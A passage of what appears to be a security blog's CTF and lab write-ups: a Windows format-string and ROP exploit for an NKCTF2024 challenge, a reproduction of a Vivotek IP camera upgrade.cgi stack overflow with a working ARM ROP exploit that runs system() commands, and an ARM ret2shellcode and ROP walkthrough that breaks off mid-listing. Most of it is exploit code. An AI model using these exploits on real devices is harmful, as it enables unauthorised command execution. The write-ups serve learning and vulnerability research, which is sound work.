breakpoint with F2.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072147961.png" alt="image-20240407214749900"></p><p>Press F9, choose Local Windows debugger and click OK.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072146737.png" alt="image-20240407214646654"></p><p>Debugging can start from here.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072149394.png" alt="image-20240407214934259"></p><h2 id="结合exp调试"><a href="#结合exp调试" class="headerlink" title="Debugging together with the exp"></a>Debugging together with the exp</h2><p>Here choose attach to process, start the service with the win_server from earlier, run the exp in the VM so it connects to the program, then pick the matching process and debugging works.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072150216.png" alt="image-20240407215036153"></p><p>Here you can see we are now debugging inside the very process our exp is connected to.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072154988.png" alt="image-20240407215410841"></p><p><img 
src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072155927.png" alt="image-20240407215529896"></p><h1 id="例题-NKCTF2024-签到"><a href="#例题-NKCTF2024-签到" class="headerlink" title="Example: NKCTF2024 check-in"></a>Example: NKCTF2024 check-in</h1><p>There are obvious format string and stack overflow vulnerabilities. Since I was not familiar with the layout of the libc used under winpwn, I did not use the format string bug to leak libc; instead I used it to leak the canary first, then leaked the real address of puts with ROP. (Note that, for whatever reason, %x$p does not work in winpwn, so a long run of %p has to be sent before anything leaks.)</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072157970.png" alt="image-20240407215717918"></p><p>The challenge also provides msvcrt.dll, so find the offsets of puts, system and the cmd.exe string in IDA and write the ROP chain directly.</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span 
class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><code class="hljs vim">from pwn import *<br>from ctypes import *<br>from struct import pack<br>#libc=ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">'192.168.3.113'</span><br>port = <span class="hljs-number">1234</span><br>local = <span class="hljs-number">0</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br>#context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'i386'</span>)<br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br><span class="hljs-keyword">sl</span> = lambda data : io.sendline(data)<br><span class="hljs-keyword">sa</span> = lambda text, data 
: io.sendafter(text, data)<br><span class="hljs-keyword">sla</span> = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br><span class="hljs-keyword">ru</span> = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-keyword">b</span><span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = lambda : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br><span class="hljs-keyword">lg</span> = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br><span class="hljs-keyword">ia</span> = lambda : io.interactive()<br><br>puts_plt=<span class="hljs-number">0</span>x0403F8C<br>puts_got=<span class="hljs-number">0</span>x0409230<br><br>pause()<br><span class="hljs-keyword">ru</span>(<span class="hljs-string">"NKCTF2024\r\n"</span>)<br>payload=<span class="hljs-keyword">b</span><span class="hljs-string">'%p'</span>*<span class="hljs-number">0</span>x1e+<span class="hljs-keyword">b</span><span class="hljs-string">'S'</span>+<span class="hljs-keyword">b</span><span class="hljs-string">'%p'</span><br><span 
class="hljs-keyword">sl</span>(payload)<br><span class="hljs-keyword">ru</span>(<span class="hljs-keyword">b</span><span class="hljs-string">'S'</span>)<br>canary=<span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">8</span>),<span class="hljs-number">16</span>)<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"canary"</span>)<br><br><span class="hljs-keyword">ru</span>(<span class="hljs-string">"ohhh,no"</span>)<br>payload=<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*(<span class="hljs-number">0</span>x70-<span class="hljs-number">0</span>xc)+p32(canary)+<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">8</span>+<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">4</span>+p32(puts_plt)+p32(<span class="hljs-number">0</span>x00401473)+p32(puts_got)<br><span class="hljs-keyword">sl</span>(payload)<br><br><span class="hljs-string">""</span><span class="hljs-comment">"</span><br>#remote<br>dll_base=u32(io.recv(<span class="hljs-number">4</span>))-<span class="hljs-number">0</span>x1017BA80<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"dll_base"</span>)<br><span class="hljs-built_in">system</span>=dll_base+<span class="hljs-number">0</span>x10144700<br>cmd=dll_base+<span class="hljs-number">0</span>x101048C8<br><span class="hljs-string">""</span><span class="hljs-comment">"</span><br>#local<br>dll_base=u32(io.recv(<span class="hljs-number">4</span>))-<span class="hljs-number">0</span>x10179E20<br><span class="hljs-keyword">lg</span>(<span class="hljs-string">"dll_base"</span>)<br><span class="hljs-built_in">system</span>=dll_base+<span class="hljs-number">0</span>x10143D30<br>cmd=dll_base+<span class="hljs-number">0</span>x101047A4<br><br><span class="hljs-keyword">ru</span>(<span class="hljs-string">"NKCTF2024\r\n"</span>)<br>payload=<span class="hljs-keyword">b</span><span 
class="hljs-string">'%p'</span>*<span class="hljs-number">0</span>x1e+<span class="hljs-keyword">b</span><span class="hljs-string">'S'</span>+<span class="hljs-keyword">b</span><span class="hljs-string">'%p'</span><br><span class="hljs-keyword">sl</span>(payload)<br><br>pause()<br><span class="hljs-keyword">ru</span>(<span class="hljs-string">"ohhh,no"</span>)<br>payload=<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*(<span class="hljs-number">0</span>x70-<span class="hljs-number">0</span>xc)+p32(canary)+<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">8</span>+<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">4</span>+p32(<span class="hljs-built_in">system</span>)+p32(<span class="hljs-number">0</span>)+p32(cmd)<br><span class="hljs-keyword">sl</span>(payload)<br><br><br><span class="hljs-keyword">ia</span>()<br></code></pre></td></tr></table></figure><p>Another thing to note: debug logging has to be turned on, and the flag read with type flag.txt; possibly because of an encoding issue, the printed string is not visible without debug on.</p>]]></content>
</entry>
<entry>
<title>vivotek摄像头栈溢出漏洞复现</title>
<link href="/2024/03/22/vivotek%E6%91%84%E5%83%8F%E5%A4%B4%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"/>
<url>/2024/03/22/vivotek%E6%91%84%E5%83%8F%E5%A4%B4%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<p>Reference links:</p><p><a href="https://p1kk.github.io/2021/04/14/iot/vivotek%20%E6%91%84%E5%83%8F%E5%A4%B4%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">https://p1kk.github.io/2021/04/14/iot/vivotek%20%E6%91%84%E5%83%8F%E5%A4%B4%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/</a></p><p><a href="https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/VIVOTEK/remote_stack_overflow">https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/VIVOTEK/remote_stack_overflow</a></p><h1 id="环境模拟"><a href="#环境模拟" class="headerlink" title="Environment emulation"></a>Environment emulation</h1><p>Unpacking with binwalk first gives a fairly complicated directory tree, so start by locating the squashfs:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">youlin@ubuntu:~/rw/VIVOTEK/remote_stack_overflow/firmware/_CC8160-VVTK-0100d.flash.pkg.extracted$ find -name squ*<br>./_31.extracted/_rootfs.img.extracted/squashfs-root-0<br>./_31.extracted/_rootfs.img.extracted/squashfs-root<br>youlin@ubuntu:~/rw/VIVOTEK/remote_stack_overflow/firmware/_CC8160-VVTK-0100d.flash.pkg.extracted$<br></code></pre></td></tr></table></figure><p>Then confirm the architecture.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222144017.png" alt="image-20240322214444893"></p><p>I chose QEMU system-mode emulation here: after configuring the network interface, upload the filesystem, then mount /dev and /proc.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">mount -t proc /proc ./squashfs-root/proc<br>mount -o <span 
class="hljs-built_in">bind</span> /dev ./squashfs-root/dev<br></code></pre></td></tr></table></figure><p>Then try to start the httpd service.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222151720.png" alt="image-20240322215149691"></p><p>Seeing the error above, look up the path of boa.conf in IDA.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222152998.png" alt="image-20240322215259964"></p><p>The files extracted by binwalk also contain it, so upload the whole directory to the corresponding location.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222157151.png" alt="image-20240322215703123"></p><p>The error then changes to this one; find the place in IDA that triggers it.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222158866.png" alt="image-20240322215814826"></p><p>It uses gethostbyname(), which returns the IP address found through the host name (kept in the rlimits structure); changing it as shown below is enough, and with that the httpd service is running.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222200381.png"></p><h1 id="漏洞分析以及调试"><a href="#漏洞分析以及调试" class="headerlink" title="Vulnerability analysis and debugging"></a>Vulnerability analysis and debugging</h1><p>A stack overflow caused by strncpy.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403222201129.png" alt="image-20240322220115102"></p><ul><li><p>strncpy() copies the first n characters of a string; its prototype is:<br><code>char * strncpy(char *dest, const char *src, size_t n);</code></p><p>[Parameters] dest is the destination string pointer, src the source string pointer.</p><p>strncpy() copies the first n characters of src into dest.</p><p>Unlike strcpy(), <strong>strncpy() does not append the terminator '\0' to dest</strong> (no terminator is written when src has n or more characters), which leads to many counter-intuitive problems, as illustrated below.</p><p>Note: the memory regions pointed to by src and dest must not overlap, and dest must have enough room for n characters.</p><p>[Return value] returns dest.</p></li><li><p>strchr() finds the first occurrence of a character in a string; its prototype is:<br><code>char * strchr (const char *str, int c);</code></p><p>[Parameters] str is the string to search, c the character to look for.</p><p>strchr() locates <strong>the address of the first occurrence of the character c in str</strong> and returns that address.</p><p>Note: the terminating NUL of str is included in the search, so the end of str can be located as well.</p><p>[Return value] the address of the character if it is found, otherwise NULL.</p><p>The returned address is the address of the string in memory plus the position of the searched character within it: if the character first appears at index i, the return value can be read as str + i.</p></li></ul><p>poc:</p><figure class="highlight python"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python">from pwn import *<br>import requests<br><br>header = {<br>"Content-Length":"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa"<br>}<br><br>url = "http://192.168.65.2" + "/cgi-bin/admin/upgrade.cgi"<br><br><br>session = requests.session()<br>session.post(url, headers=header)<br></code></pre></td></tr></table></figure><p>This measures the overflow offset as 51; next comes the ARM stack overflow exploitation.</p><h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="Exploitation"></a>Exploitation</h1><p>Once the offset of 51 is known, exploitation is fairly simple. Note, however, that since the overflow is caused by strncpy, the payload cannot contain '\x00'; so ASLR has to be turned off and the gadgets taken from libc, and the pop {r0,pc} gadget cannot be used directly because its address contains \x00.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403230054749.png" alt="image-20240323005449617"></p><p>So pop {r1,pc} and mov r0,r1 are used instead.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403230056475.png" alt="image-20240323005650421"></p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br>import requests<br><span class="hljs-attribute">libc</span>=ELF("libuClibc-0.9.33.3-git.so")<br><br><span class="hljs-attribute">libcbase</span>=0x76f2d000<br><span class="hljs-attribute">pop_r0</span>=libcbase+0x00033100<br><span class="hljs-attribute">pop_r1</span>=libcbase+0x00048784<br><span class="hljs-attribute">mov_r0_r1</span>=0x00016aa4+libcbase #mov r0, r1; pop {r4, r5, pc};<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><span class="hljs-attribute">cmd_addr</span>=0x7effeb74<br><span class="hljs-attribute">cmd</span>=b'echo <span class="hljs-string">"pwned_sucess"</span> > /tmp/test.txt;<span class="hljs-string">'</span><br><span class="hljs-string"></span><br><span class="hljs-string">payload=b'</span>A<span class="hljs-string">'*51+p32(pop_r1)+p32(cmd_addr)+p32(mov_r0_r1)+b'</span>A<span class="hljs-string">'*8+p32(system)+cmd</span><br><span class="hljs-string">#payload=b'</span>A<span class="hljs-string">'*51+b'</span>B<span class="hljs-string">'*4</span><br><span class="hljs-string"></span><br><span class="hljs-string">header = {</span><br><span class="hljs-string">"Content-Length":payload</span><br><span class="hljs-string">}</span><br><span class="hljs-string"></span><br><span class="hljs-string">url = "http://192.168.182.111" + "/cgi-bin/admin/upgrade.cgi"</span><br><span 
class="hljs-string"></span><br><span class="hljs-string"></span><br><span class="hljs-string">session = requests.session()</span><br><span class="hljs-string">session.post(url, headers=header)</span><br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403230104802.png" alt="image-20240323010452749"></p>]]></content>
</entry>
<entry>
<title>异构学习</title>
<link href="/2024/03/15/%E5%BC%82%E6%9E%84%E5%AD%A6%E4%B9%A0/"/>
<url>/2024/03/15/%E5%BC%82%E6%9E%84%E5%AD%A6%E4%B9%A0/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h1><p>Getting a shell and command execution on non-x86 architectures has always been a weak area for me. Although 国资 from 星盟 gave a training on it earlier, the material was fairly basic and still lacking when it comes to building payloads for real IoT devices, so this is a fresh study of the topic.</p><p>Reference links:</p><p><a href="https://github.com/ReAbout/pwn-exercise-iot">https://github.com/ReAbout/pwn-exercise-iot</a></p><h1 id="arm架构"><a href="#arm架构" class="headerlink" title="ARM architecture"></a>ARM architecture</h1><h2 id="基础知识"><a href="#基础知识" class="headerlink" title="Basics"></a>Basics</h2><h3 id="arm函数调用约定"><a href="#arm函数调用约定" class="headerlink" title="ARM calling convention"></a>ARM calling convention</h3><p>32-bit ARM:</p><ul><li>Arguments 1 to 4 are passed in registers R0 to R3; the remaining arguments are pushed onto the stack from right to left, the callee balances the stack, and the return value is placed in R0.</li><li>ARM uses R0 as the default return value register.</li></ul><p>64-bit ARM:</p><ul><li>Arguments 1 to 8 are passed in registers X0 to X7; the remaining arguments are pushed onto the stack from right to left, the callee balances the stack, and the return value is placed in X0.</li></ul><p><a href="https://bbs.pediy.com/thread-224583.htm">Common calling conventions (x86, x64, arm, arm64)</a></p><h3 id="arm汇编"><a href="#arm汇编" class="headerlink" title="ARM assembly"></a>ARM assembly</h3><p><a href="https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#arm">https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#arm</a></p><h2 id="pwn例题-typo"><a href="#pwn例题-typo" class="headerlink" title="pwn example: typo"></a>pwn example: typo</h2><p>binary: <a href="https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_arm_stack/arm_pwn_typo/typo">typo</a></p><p>Two approaches.</p><h3 id="1-ret2shellcode"><a href="#1-ret2shellcode" class="headerlink" title="1. ret2shellcode"></a>1. ret2shellcode</h3><p>If I remember correctly this approach only works locally, because the stack address obtained through debugging changes with the QEMU setup, and the remote stack address is very likely different.</p><p>Get the offset directly through debugging, write the shellcode onto the stack, then overwrite the return address with the shellcode's address.</p><p>exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><span class="hljs-comment">#banary = "./pwn"</span><br><span class="hljs-comment">#elf = ELF(banary)</span><br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">0</span><br><span class="hljs-keyword">if</span> local:<br> io = process([<span class="hljs-string">"qemu-arm-static"</span>,<span class="hljs-string">"-L"</span>,<span 
class="hljs-string">"/usr/arm-linux-gnueabi"</span>,<span class="hljs-string">"./typo"</span>])<br><span class="hljs-keyword">else</span>:<br> io = process([<span class="hljs-string">"qemu-arm-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/arm-linux-gnueabi"</span>,<span class="hljs-string">"-g"</span>,<span class="hljs-string">"1234"</span>,<span class="hljs-string">"./typo"</span>])<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'arm'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span 
class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>ru(<span class="hljs-string">"Input ~ if you want to quit"</span>)<br>s(<span class="hljs-string">b'\n'</span>)<br><br>sleep(<span class="hljs-number">0.5</span>)<br>io.recv()<br>payload=asm(shellcraft.sh()).ljust(<span class="hljs-number">112</span>,<span class="hljs-string">b'A'</span>)+p32(<span class="hljs-number">0xfffeef44</span>)<span class="hljs-comment">#shellcode</span><br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure><h3 id="2-rop"><a href="#2-rop" class="headerlink" title="2. ROP"></a>2. ROP</h3><p><code>svc: r7=0xb; R0=addr("/bin/sh"); R1=0; R2=0</code><br>The system call above is equivalent to execve("/bin/sh",0,0).</p><p>svc: this instruction switches to SVC mode (svc replaces the older swi instruction and is the system call instruction ARM provides) and enters the software interrupt handler (SWI handler).</p><p>So the target state for our ROP chain is:</p><ul><li>R0 = "/bin/sh"</li><li>R1 = 0</li><li>R2 = 0</li><li>R7 = 0xb (the execve system call number on ARM)</li><li>svc</li></ul><p>1. The address of /bin/sh can be found directly in IDA: 0x006C384</p><p>2. ROP</p><blockquote><p>Here pc plays the part of ret on x86, which is what makes these instructions usable as gadgets.</p></blockquote><figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-number">0x00020904</span> : <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r0</span>, <span class="hljs-built_in">r4</span>, <span class="hljs-built_in">pc</span>} <br><span class="hljs-number">0x00068bec</span> : <span 
class="hljs-keyword">pop</span> {<span class="hljs-built_in">r1</span>, <span class="hljs-built_in">pc</span>} <br><span class="hljs-number">0x00014068</span> : <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r7</span>, <span class="hljs-built_in">pc</span>} <br></code></pre></td></tr></table></figure><p>There is no gadget for the r2 register, so it has to be set through a mov; since we already control r4, look for a <code>mov r2, r4</code> and then jump back via blx r3.</p><figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs armasm">(typo/ELF/<span class="hljs-meta">ARM</span>)> search <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r2</span>, <span class="hljs-built_in">r4</span><br>[<span class="hljs-meta">INFO</span>] Searching for gadgets: <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r2</span>, <span class="hljs-built_in">r4</span><br><br>[<span class="hljs-meta">INFO</span>] File: typo<br><span class="hljs-number">0x0003338c</span>: <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r2</span>, <span class="hljs-built_in">r4</span><span class="hljs-comment">; blx r3;</span><br></code></pre></td></tr></table></figure><p>So we also need a gadget that controls the r3 register.</p><figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs armasm">(typo/ELF/<span class="hljs-meta">ARM</span>)> search <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r3</span><br>[<span class="hljs-meta">INFO</span>] Searching for gadgets: <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r3</span><br><br>[<span class="hljs-meta">INFO</span>] 
File: typo<br><span class="hljs-number">0x00053d10</span>: <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r3</span>, <span class="hljs-built_in">lr</span>}<span class="hljs-comment">; bx r3; </span><br><span class="hljs-number">0x00008160</span>: <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r3</span>, <span class="hljs-built_in">pc</span>}<span class="hljs-comment">; #choose this one</span><br></code></pre></td></tr></table></figure><p>Finally, find the svc gadget.</p><figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs clean">(typo/ELF/ARM)> search svc<br>[INFO] Searching for gadgets: svc<br><br>[INFO] File: typo<br><span class="hljs-number">0x00023b78</span>: svc #<span class="hljs-number">0</span>; b #<span class="hljs-number">0x1ba94</span>; ldr r3, [pc, #<span class="hljs-number">0xa8</span>]; ldr r0, [r3, #<span class="hljs-number">4</span>]; sub sp, fp, #<span 
